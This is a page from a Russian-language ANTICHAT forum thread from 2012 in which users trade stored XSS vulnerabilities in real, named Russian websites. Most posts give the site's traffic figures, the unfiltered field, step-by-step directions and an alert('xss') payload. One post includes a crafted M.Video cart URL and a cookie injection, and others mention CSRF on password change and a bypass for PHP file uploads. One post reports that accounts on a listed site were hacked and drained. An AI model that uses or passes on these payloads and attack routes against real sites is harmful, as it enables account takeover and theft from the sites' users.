HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
Ответ
Страница 48 из 54 « Первая < 38 44 45 46 47 48 49 50 51 52 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #471  
Старый 16.01.2012, 20:52
justonline
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами: 7787126

Репутация: 53
По умолчанию
zzima.com | Active xss

Тиц: 475;

Пр: 4;

При создании группы(http://www.zzima.com/createGroup)

Отсутствует фильтрация в поле "Веб сайт".



+ Там есть функция - пригласить в группу.
 
Ответить с цитированием

  #472  
Старый 28.01.2012, 07:24
OxoTnik
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами: 7854806

Репутация: 173


По умолчанию
tiu.ru

tiu.ru

тиц 5600

траф 40 000~



1) Заходим на сайт

2) сверху жмякаем "Добавить компанию"

3) Уязвимое поле "Название компании"

а вообще все поля уязвимы, только надо шифроваться
 
Ответить с цитированием

  #473  
Старый 28.01.2012, 20:38
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
Russia.ru

Активная xss в теле письма на russia.ru

Сайт Почта



В теле письма отправляем код

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
 
Ответить с цитированием

  #474  
Старый 29.01.2012, 19:48
hic991
Новичок
Регистрация: 28.01.2012
Сообщений: 0
С нами: 7520726

Репутация: 0
По умолчанию
Активная XSS на qchat.su

Уязвимое поле Тема билета

Код:
">alert(/XSS/)


Сайт снова открыт, на главной странице сообщение о взломе аккаунтов и переводе с них денег. Уязвимость закрыта. Ищу другую
 
Ответить с цитированием

  #475  
Старый 03.02.2012, 17:36
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами: 8285366

Репутация: 62
По умолчанию
берлога.net - развлекательный сайт, торрент-трекер

pr: 3

тиц: 250

статистика согласно бигмирнет

хостов Сегодня 62 803

хостов Вчера 143 702

уязвимое поле, в анкете «музыкальные предпочтения»



также на сайте csrf на смену пароля, и множество пасивок, обход лимита на добавление релизов, заливка файлов php вместо картинок (загрузка через флешплеер, и фильтрация расширений только при выборе, то есть на js) только вот не выполняются они, а скачиваются в оригинале, но может кто найдёт lfi
 
Ответить с цитированием

  #476  
Старый 04.02.2012, 18:47
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
molnet.ru - статьи по жизненным ситуациям в Москве

тИЦ - 900

Уязвимый код: alert('XSS')

1) Регистрируемся

2) Заходим в свой профиль

3) Добавляем комментарий с уязвимым кодом и обновляем страницу
 
Ответить с цитированием

  #477  
Старый 05.02.2012, 18:21
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
М.Видео – бытовая техника и электроника по доступным ценам. Удобный интернет-магазин.

тИЦ - 2200

Добавляем уязвимый код:

Код:
http://www.mvideo.ru/homeshop/?p=cart&step=0&_recount=0&droppayment=1&delivery_type_20024096=1&ids%5B20024096%5D=1&cert_cb%5B20024096%5D=0&city_zones_id=0&promo_code_value=">alert('xss')&promo_code=1
Переходим сюда:

Код:
http://www.mvideo.ru/homeshop/?p=cart
+ XSS из-за недостаточной фильтрации в Cookie

Уязвимое место:

Код:
phorum_name:">alert('xss');
Переходим в любую тему на форуме М.Видео и XSS выполняется.

Скриншот:



+ Еще одна активка

1) Регистрируемся в системе

2) Заходим в свой профиль

3) Добавляем адрес доставки

Уязвимые поля: Корпус (cтроение), Подъезд, Телефон 2, Факс

Уязвимый код:

Код:
">alert('xss')
Скриншот:
 
Ответить с цитированием

  #478  
Старый 08.02.2012, 20:32
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
Serva4ok - игровой хостинг.

тИЦ - 100

1) Регистрируемся на сайте

2) Создаем свою команду

После создания команды, переходим в Наш состав => [подробный список]

Редактировать игрока => id[ваш_id] => Выполнить

Уязвимое поле: Отзыв капитана команды

Уязвимый код:

Код:
alert('xss')
Пример:

Код:
http://www.serva4ok.ru/index.php?do=profiler&act=fight_logs&file_id=82546
 
Ответить с цитированием

  #479  
Старый 09.02.2012, 23:50
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
Olike - Бесплатные сердечки ВКонтакте (популярен среди любителей "лайков").

Уязвимый код:

Код:
">alert(/xss/)
Жмякаем на "Использовать Лайки"

В поле "Название страницы" пишем наш уязвимый код.

После чего переходим в "Мои Заказы" и наша XSS выполняется.
 
Ответить с цитированием

  #480  
Старый 10.02.2012, 01:43
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами: 7735286

Репутация: 1
По умолчанию
Drive2.ru - все автомобили мира: отзывы, фото, видео, блоги.

тИЦ - 1100

Уязвимый код:

Код:
alert('xss')
1) Проходим авторизацию на сайте

2) Жмякаем "Написать" => "в мой блог"

3) Добавляем уязвимый код в поле "Ключевые слова (метки)"
 
Ответить с цитированием
Ответ
Страница 48 из 54 « Первая < 38 44 45 46 47 48 49 50 51 52 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.